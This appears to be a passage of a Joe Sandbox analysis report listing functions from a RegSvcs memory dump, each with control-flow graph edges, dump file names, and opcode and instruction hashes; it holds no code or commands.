                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 484 5b74630-5b74687 490 5b74691-5b74b1e 484->490 560 5b74b24-5b74b34 490->560 561 5b75070-5b75093 490->561 560->561 562 5b74b3a-5b74b4a 560->562 562->561 564 5b74b50-5b74b60 562->564 564->561 565 5b74b66-5b74b76 564->565 565->561 566 5b74b7c-5b74b8c 565->566 566->561 567 5b74b92-5b74ba2 566->567 567->561 568 5b74ba8-5b74bb8 567->568 568->561 569 5b74bbe-5b74bce 568->569 569->561 570 5b74bd4-5b74be4 569->570 570->561 571 5b74bea-5b74bfa 570->571 571->561 572 5b74c00-5b7506f 571->572
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c3fee12417f82a1e32e6c7ee03538a3246d3fa312e61fb35d92f7ad462043390
                                    • Instruction ID: 38b1b781f78b35c92dbef3268ba8d790febf8f91f7fc08b528a21fdb6c6c7809
                                    • Opcode Fuzzy Hash: c3fee12417f82a1e32e6c7ee03538a3246d3fa312e61fb35d92f7ad462043390
                                    • Instruction Fuzzy Hash: BC42FE34A0021DCFEB14DBA4C860BAEBA76FF95300F1081A9C61A6B3A5DF355E85DF51
                                    Function 05B74621 Relevance: .6, Instructions: 575COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 637 5b74621-5b74622 638 5b74624-5b74628 637->638 639 5b74629-5b7462a 637->639 638->639 640 5b74631-5b7467a 639->640 641 5b7462c-5b74630 639->641 646 5b74684-5b74687 640->646 641->640 647 5b74691-5b74b1e 646->647 717 5b74b24-5b74b34 647->717 718 5b75070-5b75093 647->718 717->718 719 5b74b3a-5b74b4a 717->719 719->718 721 5b74b50-5b74b60 719->721 721->718 722 5b74b66-5b74b76 721->722 722->718 723 5b74b7c-5b74b8c 722->723 723->718 724 5b74b92-5b74ba2 723->724 724->718 725 5b74ba8-5b74bb8 724->725 725->718 726 5b74bbe-5b74bce 725->726 726->718 727 5b74bd4-5b74be4 726->727 727->718 728 5b74bea-5b74bfa 727->728 728->718 729 5b74c00-5b7506f 728->729
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 30a0ef00c58c3d0cf664ad90e72928242cc7d60cceaa72bca310fc0b4f2adfe8
                                    • Instruction ID: 00cdd1daec249ca93a61eb2ff57ba97018b52fc6fb1e0ff3106ad4ffb73dfb01
                                    • Opcode Fuzzy Hash: 30a0ef00c58c3d0cf664ad90e72928242cc7d60cceaa72bca310fc0b4f2adfe8
                                    • Instruction Fuzzy Hash: 1242FD34A0021DCFEB14DBA4C860BAEBA76FF95300F1081A9C61A6B3A5DF355E85DF51
                                    Function 05B75228 Relevance: .4, Instructions: 448COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1044 5b75228-5b7522a 1045 5b75231-5b75232 1044->1045 1046 5b7522c-5b75230 1044->1046 1047 5b75234-5b75238 1045->1047 1048 5b75239-5b75245 1045->1048 1046->1045 1047->1048 1050 5b75247-5b7524c 1048->1050 1051 5b75251-5b7525d 1048->1051 1052 5b755e6-5b755eb 1050->1052 1054 5b7525f-5b7526b 1051->1054 1055 5b7526d-5b75272 1051->1055 1054->1055 1057 5b75277-5b75283 1054->1057 1055->1052 1059 5b75285-5b75291 1057->1059 1060 5b75293-5b75298 1057->1060 1059->1060 1062 5b7529d-5b752a8 1059->1062 1060->1052 1064 5b75352-5b7535d 1062->1064 1065 5b752ae-5b752b9 1062->1065 1070 5b75363-5b75372 1064->1070 1071 5b75400-5b7540c 1064->1071 1068 5b752cf 1065->1068 1069 5b752bb-5b752cd 1065->1069 1072 5b752d4-5b752d6 1068->1072 1069->1072 1078 5b75374-5b7537e 1070->1078 1079 5b75383-5b75392 1070->1079 1080 5b7540e-5b7541a 1071->1080 1081 5b7541c-5b7542e 1071->1081 1075 5b752f6-5b752fb 1072->1075 1076 5b752d8-5b752e7 1072->1076 1075->1052 1076->1075 1086 5b752e9-5b752f4 1076->1086 1078->1052 1089 5b753b6-5b753bf 1079->1089 1090 5b75394-5b753a0 1079->1090 1080->1081 1088 5b7545c-5b75467 1080->1088 1093 5b75452-5b75457 1081->1093 1094 5b75430-5b7543c 1081->1094 1086->1075 1097 5b75300-5b75309 1086->1097 1103 5b7546d-5b75476 1088->1103 1104 5b75549-5b75554 1088->1104 1099 5b753d5 1089->1099 1100 5b753c1-5b753d3 1089->1100 1101 5b753a2-5b753a7 1090->1101 1102 5b753ac-5b753b1 1090->1102 1093->1052 1114 5b7543e-5b75443 1094->1114 1115 5b75448-5b7544d 1094->1115 1109 5b75315-5b75324 1097->1109 1110 5b7530b-5b75310 1097->1110 1106 5b753da-5b753dc 1099->1106 1100->1106 1101->1052 1102->1052 1116 5b7548c 1103->1116 1117 5b75478-5b7548a 1103->1117 1118 5b75556-5b75560 1104->1118 1119 5b7557e-5b7558d 1104->1119 1106->1071 1112 5b753de-5b753ea 1106->1112 1127 5b75326-5b75332 1109->1127 1128 5b75348-5b7534d 1109->1128 1110->1052 1129 5b753f6-5b753fb 1112->1129 1130 5b753ec-5b753f1 1112->1130 1114->1052 1115->1052 1120 5b75491-5b75493 1116->1120 1117->1120 1135 5b75577-5b7557c 1118->1135 1136 5b75562-5b7556e 1118->1136 1132 5b755e1 1119->1132 1133 5b7558f-5b7559e 1119->1133 1125 5b75495-5b754a1 1120->1125 1126 5b754a3 1120->1126 1134 5b754a8-5b754aa 1125->1134 1126->1134 1142 5b75334-5b75339 1127->1142 1143 5b7533e-5b75343 1127->1143 1128->1052 1129->1052 1130->1052 1132->1052 1133->1132 1145 5b755a0-5b755b8 1133->1145 1139 5b754b6-5b754c9 1134->1139 1140 5b754ac-5b754b1 1134->1140 1135->1052 1136->1135 1147 5b75570-5b75575 1136->1147 1148 5b75501-5b7550b 1139->1148 1149 5b754cb 1139->1149 1140->1052 1142->1052 1143->1052 1160 5b755da-5b755df 1145->1160 1161 5b755ba-5b755d8 1145->1161 1147->1052 1156 5b7550d-5b75519 call 5b75098 1148->1156 1157 5b7552a-5b75536 1148->1157 1150 5b754ce-5b754df call 5b75098 1149->1150 1158 5b754e6-5b754eb 1150->1158 1159 5b754e1-5b754e4 1150->1159 1171 5b75520-5b75525 1156->1171 1172 5b7551b-5b7551e 1156->1172 1166 5b7553f 1157->1166 1167 5b75538-5b7553d 1157->1167 1158->1052 1159->1158 1164 5b754f0-5b754f3 1159->1164 1160->1052 1161->1052 1168 5b755ec-5b75648 1164->1168 1169 5b754f9-5b754ff 1164->1169 1173 5b75544 1166->1173 1167->1173 1179 5b7565b-5b75666 1168->1179 1180 5b7564a-5b75655 1168->1180 1169->1148 1169->1150 1171->1052 1172->1157 1172->1171 1173->1052 1183 5b75737-5b7575a 1179->1183 1184 5b7566c-5b756c9 1179->1184 1180->1179 1185 5b756de-5b75730 1180->1185 1195 5b75761-5b75762 1183->1195 1196 5b7575c-5b75760 1183->1196 1192 5b756d2-5b756db 1184->1192 1185->1183 1198 5b75764-5b75768 1195->1198 1199 5b75769-5b7577c call 5b740a8 1195->1199 1196->1195 1198->1199 1204 5b7577e-5b7578b 1199->1204 1205 5b7578d-5b7579b 1199->1205 1212 5b757ab-5b757ae 1204->1212 1209 5b7579d-5b757a7 1205->1209 1210 5b757a9 1205->1210 1209->1212 1210->1212
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1245a8ae7667af4436d29c6144d3de3013fcf5ca763de0dd2241f72d59f93992
                                    • Instruction ID: bb26346eb8503772845a2eebbf49dfd6c96a704a9ae2ec8b790dfe80d9c6fb02
                                    • Opcode Fuzzy Hash: 1245a8ae7667af4436d29c6144d3de3013fcf5ca763de0dd2241f72d59f93992
                                    • Instruction Fuzzy Hash: 59E18C317482498FDB259B29D858B3D77ABFF84640F1444EAE522CF3E1EA25EC42C751
                                    Function 05B73AF0 Relevance: .4, Instructions: 435COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7be972e8c06e3845825c47099550e90f95ad09132bd7a3bac82c21eed54cd224
                                    • Instruction ID: 0cb685c908406570837df6019c8b76dbab1acf7a9016725e52e1942b55112405
                                    • Opcode Fuzzy Hash: 7be972e8c06e3845825c47099550e90f95ad09132bd7a3bac82c21eed54cd224
                                    • Instruction Fuzzy Hash: 65021B31A04509DFCF14CF68C584ABABBFAFF48301F158995E466AB291D731F981CBA1
                                    Function 05B78E07 Relevance: .4, Instructions: 373COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 69144a277e85d47763809552084b571a4ee7a54cbd99dc6ea6d847c34b2969d8
                                    • Instruction ID: ed8aecf78814a3f3cbd54b89ade681933d39c4c676e1356e8714bdd485b3f41e
                                    • Opcode Fuzzy Hash: 69144a277e85d47763809552084b571a4ee7a54cbd99dc6ea6d847c34b2969d8
                                    • Instruction Fuzzy Hash: 2FE13C34A0020ADFDB05DBB9D854AAEBFB7FB88310F1080A9E915A7355DB35ED81CB51
                                    Function 05B702AD Relevance: .3, Instructions: 348COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 69950bd5b3dc53e115645cecb4abb864c20c94e3590bcfe79844a751f06f12c7
                                    • Instruction ID: ee00613c5473478fa285aed333ea93f9d9050962023eea8da57f600f81a23392
                                    • Opcode Fuzzy Hash: 69950bd5b3dc53e115645cecb4abb864c20c94e3590bcfe79844a751f06f12c7
                                    • Instruction Fuzzy Hash: 8AE06D3270D3D41FC7125A695C6485ABFA5AECB254B1948EBF4D4C7263C410980AD7A2
                                    Function 05B71E40 Relevance: .3, Instructions: 346COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b703c54c3702ab17ac316cb6b4d75f43814d56fb8b85a0a38786c9d301b264d2
                                    • Instruction ID: cee6ac9331a0fb439eff06a5e3a7d8f52b73c8c285d9b59167878c075614fc64
                                    • Opcode Fuzzy Hash: b703c54c3702ab17ac316cb6b4d75f43814d56fb8b85a0a38786c9d301b264d2
                                    • Instruction Fuzzy Hash: 25C1D0347042598FDB159F79C854A3EBBA7FF88240F1484A9E926CB394DB34EC01CBA1
                                    Function 05B722F0 Relevance: .2, Instructions: 235COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c14930f9229f3834368fa6a994bb0f04e039dc39ea832e1a7558f594cd7e2a0d
                                    • Instruction ID: a3a89acab7c6e1330179b462a2f3fbfa52ad222ac177169def10e2d7721f1799
                                    • Opcode Fuzzy Hash: c14930f9229f3834368fa6a994bb0f04e039dc39ea832e1a7558f594cd7e2a0d
                                    • Instruction Fuzzy Hash: B3917E78A04209DFCB14CFA9C8949AAF7B2FF89304B1581E9D526EB365D731F841CB91
                                    Function 05B742F0 Relevance: .2, Instructions: 213COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4b23ca287545e03c089b1c83fb763497bd2a15279dbdd36271c723e32134af72
                                    • Instruction ID: d70433ec80faf416dd2f822cc9e39a49a10339238bfe52fd2d1037fafb0b0657
                                    • Opcode Fuzzy Hash: 4b23ca287545e03c089b1c83fb763497bd2a15279dbdd36271c723e32134af72
                                    • Instruction Fuzzy Hash: 7F614E317041599FDF14DF39C884A7A7BEAFF4534270644E9E926CB261EB30EC419B60
                                    Function 05B76FA8 Relevance: .2, Instructions: 194COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 61beb7734f9438311629f51f0d527fb9d84dda81037c249e53cbaee07c833606
                                    • Instruction ID: 7c3d2a67348f87a4c7fc4f11fd088d8e7a66cfb43f53efcdf0a11ad2375467ee
                                    • Opcode Fuzzy Hash: 61beb7734f9438311629f51f0d527fb9d84dda81037c249e53cbaee07c833606
                                    • Instruction Fuzzy Hash: EA11063061A2659FE7169B38EC24AEA3F72DB86310F4401EBE444D73D2DD349D4887E1
                                    Function 05B70A9C Relevance: .2, Instructions: 160COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 45a16ba870d93217ca688d7f10135ddd6531b1257e6e75860c66534127a2c046
                                    • Instruction ID: 66c2dd731be988756c61edaf9d04c5cc33a4500a8a17ffedfd54b725f6506e8e
                                    • Opcode Fuzzy Hash: 45a16ba870d93217ca688d7f10135ddd6531b1257e6e75860c66534127a2c046
                                    • Instruction Fuzzy Hash: 6E51F07165410CCFD318EB3CE848A25B7A3FB98318B24869AE865DB394DB74ED45CF90
                                    Function 05B70A89 Relevance: .1, Instructions: 147COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3cd05bfc4970dcc58f2e25853b93197c65cb52c742eec35030534494882aa303
                                    • Instruction ID: 5cdfec509c1cf8cba235b33bc8a7f445f57c2fed4b57d149ba6abeaf7b9b482d
                                    • Opcode Fuzzy Hash: 3cd05bfc4970dcc58f2e25853b93197c65cb52c742eec35030534494882aa303
                                    • Instruction Fuzzy Hash: 7051EF7175410CCFD314EB3DE848A25B7A3FB98318B24829AE865DB398DA74EC45CF90
                                    Function 05B740DF Relevance: .1, Instructions: 120COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 19a6f1cecab73799315ed2686c8e8c30fb9620987c75ece29f0dd01ef15fe51a
                                    • Instruction ID: 7c86cd75e62b7446b4bf89ee83abc5077c6b455d798057370df55e17c4d66e1f
                                    • Opcode Fuzzy Hash: 19a6f1cecab73799315ed2686c8e8c30fb9620987c75ece29f0dd01ef15fe51a
                                    • Instruction Fuzzy Hash: 3A4179747402099FCF14EF69D858A6A7BB6FF49201F2000A5E922CB3A1C730EC91CB51
                                    Function 05B75098 Relevance: .1, Instructions: 107COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e2b37d9e801c79b1ed78918fccaf765008eec1c78598533857659edc138e9b54
                                    • Instruction ID: 2e1396562d6d867a64b76af2f1d79b5125c026b6e6352d526012f813c59b4491
                                    • Opcode Fuzzy Hash: e2b37d9e801c79b1ed78918fccaf765008eec1c78598533857659edc138e9b54
                                    • Instruction Fuzzy Hash: CC31813070828E8BDB358B258C9467D7B76FB85652F3409DAD162CB6D2FB24E8818751
                                    Function 05B71568 Relevance: .1, Instructions: 101COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 07006222b50a24c4e2651bb85f2eaa599fe5466aa9b4a76350e4b3e6ec854e41
                                    • Instruction ID: cde490e905bb83ba97ff6a2d9cbe935f11595b94dd0510215c4805227b445f4c
                                    • Opcode Fuzzy Hash: 07006222b50a24c4e2651bb85f2eaa599fe5466aa9b4a76350e4b3e6ec854e41
                                    • Instruction Fuzzy Hash: 9B316D3160414EAFCF059F68D454ABE7BA6FF88245F044458FE2687254CB35DD61CBA4
                                    Function 05B74511 Relevance: .1, Instructions: 96COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4d6b8bab4b16f37cad6084b6fb84b3063858ce0b2c536a008ddeee1d08b2f053
                                    • Instruction ID: 3041b4ea750a0003bd61049ba419bd4e747b7b3c6ec37f27af9f3dc9445972de
                                    • Opcode Fuzzy Hash: 4d6b8bab4b16f37cad6084b6fb84b3063858ce0b2c536a008ddeee1d08b2f053
                                    • Instruction Fuzzy Hash: 272124303042194FDF254B258854A3E7A9BFFC674BF1840FAD512CB394EA65DC82D395
                                    Function 05B7978A Relevance: .1, Instructions: 94COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 17b3cf87429b001859efa343433518d0163a9f44db29e3c4216c8c2a595f2f72
                                    • Instruction ID: 9f13996820f52732e4ef669f4b2ffeb8b2292f4f783dbedacb5f1fd015282aa0
                                    • Opcode Fuzzy Hash: 17b3cf87429b001859efa343433518d0163a9f44db29e3c4216c8c2a595f2f72
                                    • Instruction Fuzzy Hash: A6216831B5421D9BD744DA7D5C0277F3697EBC9680F1444EAE416DB281EA30EC0187D2
                                    Function 05B70006 Relevance: .1, Instructions: 91COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 78968598a34a0740bbe4fe3d0c4e66234ef60afc53db459b8fab01a5800b9704
                                    • Instruction ID: df12397e9f44ce516978f871cd781da7c8a6a9bf8d0aae88273e9be9630e6d9f
                                    • Opcode Fuzzy Hash: 78968598a34a0740bbe4fe3d0c4e66234ef60afc53db459b8fab01a5800b9704
                                    • Instruction Fuzzy Hash: 1F31E3317142888FCB06DB78C8559997FF6EFCB21071A40EBE046DF7A2DA359D058752
                                    Function 05B79798 Relevance: .1, Instructions: 87COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f2f981b304c1750740536072d2e996a43df72632168a89b6ee42eb5ca31a9468
                                    • Instruction ID: b20d96595e4be3b35a4fc94a958226cabd0e12036449ed7c7abdc5afb2d49051
                                    • Opcode Fuzzy Hash: f2f981b304c1750740536072d2e996a43df72632168a89b6ee42eb5ca31a9468
                                    • Instruction Fuzzy Hash: D1213A35B5421E8BD744DA7D580177F7697F7C8690F1445BAE426DB380EA34EC0187D2
                                    Function 05B725A0 Relevance: .1, Instructions: 81COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f6a33250488ea3bbea0cc12f2ada77694f111919755322ee3b76394188570104
                                    • Instruction ID: de75cc5baa6b5ccec50a706ee6dbc3f0518db2077d78c0dc46c78da9ceb2360f
                                    • Opcode Fuzzy Hash: f6a33250488ea3bbea0cc12f2ada77694f111919755322ee3b76394188570104
                                    • Instruction Fuzzy Hash: 76212B3470424A9FC715ABB99C2456EBBEAFFC525070044AADA12CB355EF74EC4687A0
                                    Function 05B78C08 Relevance: .1, Instructions: 81COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f0bc57e3075a8af462811da7460c049d0aee1055a6c9e1e7903deb7020139318
                                    • Instruction ID: 14dc992f4fbe550d6804213b3b41f58450c2057cceb31615298f93159dcb4337
                                    • Opcode Fuzzy Hash: f0bc57e3075a8af462811da7460c049d0aee1055a6c9e1e7903deb7020139318
                                    • Instruction Fuzzy Hash: E521D335B101088FCB08DB78D5589AEBBF7FFCD210B14806AE516EB361CA31EC058B55
                                    Function 05B71558 Relevance: .1, Instructions: 69COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1a4dda0bd7ab6537b4a2ac43f9559a5db59234db0e74ffdf62cea1a8377ce95e
                                    • Instruction ID: e887bc40c81f0fd93ebd6b90a5809f487d8e44b919c4935aeb2468488fb822df
                                    • Opcode Fuzzy Hash: 1a4dda0bd7ab6537b4a2ac43f9559a5db59234db0e74ffdf62cea1a8377ce95e
                                    • Instruction Fuzzy Hash: A421AC32A1524EAFCB059F68D404B7B7BA6FB84354F0444A9EA168B354CA38ED51CBE0
                                    Function 05B70040 Relevance: .1, Instructions: 67COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7eec4612cef6d6e364bfd2742965fd96644a14464e92d77e78cc4a4b810b76e5
                                    • Instruction ID: a32821326432141a879965cbb3df41c1919bf135a6592fc1211ae24474e278c1
                                    • Opcode Fuzzy Hash: 7eec4612cef6d6e364bfd2742965fd96644a14464e92d77e78cc4a4b810b76e5
                                    • Instruction Fuzzy Hash: 2711B1357201089FCB48EB7CD45995E7BE6EBCD610B6040AAE506DB3A0DA32EC058B91
                                    Function 05B70F18 Relevance: .1, Instructions: 63COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9dda2527408836ace03295499425cd97a206e865ec54ffa10d66c86be83615b0
                                    • Instruction ID: a76829b4443b2641551167cdbae68d216107945af191a50e8c73755af6fcd8c6
                                    • Opcode Fuzzy Hash: 9dda2527408836ace03295499425cd97a206e865ec54ffa10d66c86be83615b0
                                    • Instruction Fuzzy Hash: AF21C475A002198FDB04DF98C580ADDFBF6FF88310F1482AAE915AB344E774AE45CB90
                                    Function 05B78D60 Relevance: .1, Instructions: 61COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: aab75c2e57ce6bf1ef9245f0637046d5f6b324073f7a8210f3a8f0bba6c769a5
                                    • Instruction ID: 64fbd8ae9b50c9311cf19be0a031ac903784786b071f1405d71f5894d2a6df3f
                                    • Opcode Fuzzy Hash: aab75c2e57ce6bf1ef9245f0637046d5f6b324073f7a8210f3a8f0bba6c769a5
                                    • Instruction Fuzzy Hash: 9011A334B002199FDB14DB7998096BE7AB7FB98610F1481ADE536D7354EA30AE4087D0
                                    Function 05B71DA0 Relevance: .1, Instructions: 56COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 41f27d187763626e82b6ead17b498eb2eec22372fb8784746f4198c761981db5
                                    • Instruction ID: ca16622b4d58d8fceed9620b21e8cdf5c57ce14ddef14dea142553ca2787f974
                                    • Opcode Fuzzy Hash: 41f27d187763626e82b6ead17b498eb2eec22372fb8784746f4198c761981db5
                                    • Instruction Fuzzy Hash: 1601FE32B0414C6FCF158E5C9810ABE7BABEFC9250B144095FA11C7250DA719D11CBB0
                                    Function 05B798EA Relevance: .0, Instructions: 46COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
